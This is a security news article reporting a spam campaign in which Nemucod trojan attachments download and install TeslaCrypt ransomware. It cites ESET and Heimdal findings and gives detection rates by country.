Intense Nemucod Malware Campaign Spreads Teslacrypt Ransomware

Share this…

TeslaCrypt ransomware infections continue to surge. We reported last week about the first signs of a new TeslasCrypt ransomware campaign that was slowly starting to shape up. Now, after only a few days have gone by, it appears that initial reports are correct, and we are in the midst of a large-scale TeslaCrypt attack.

As initially reported, first signs started appearing on the Bleeping Computer forums, where users were complaining about TeslaCrypt ransomware.

A further investigation by Heimdal Security revealed the dangerous spam-powered campaign behind these infections, which at that time affected mostly users in Scandinavian countries.

The campaign escalated during the past week

Multiple times during this current week, several other cyber-security vendors also mentioned a rise in TeslaCrypt detections, but today, ESET’s team published an in-depthtechnical write-up on the new campaign, also confirming Heimdal’s initial research.

The infection chronology is simple and as follows:

☺    Users receive a spam email about an unpaid invoice

☺    Users download the email attachment, booby-trapped with the Nemucod trojan

☺    Users unzip the archive and Nemucod uses JavaScript to download an EXE file from the Internet

☺    The EXE file is executed automatically

♥      The TeslaCrypt ransomware is installed

According to ESET, during the past days, the company’s security products detected and stopped numerous of these infections, from all around the world, but most in Japan.

ESET reports that at one point, for a span of two days, 75% of all malware detections in Japan were related to this Nemucod-TeslaCrypt campaign.

Similarly high numbers were also reported in Italy, with 30%, Spain, with 23%, the US, with 15%, Canada, with 15%, and Argentina with 14%. Globally, the detection rate for this campaign was of 10%.

“The fact that the numbers of affected users has not been as high as previous ransomware campaigns despite the elevated number of detections is good news,” says ESET’s Josep Albors. “It means that the users are using protection measures capable of detecting new threats and it can also mean that they are not executing suspicious files attached to emails as the one we’ve analyzed.”

TeslaCrypt ransomware infections, heatmap

TeslaCrypt ransomware infections, heatmap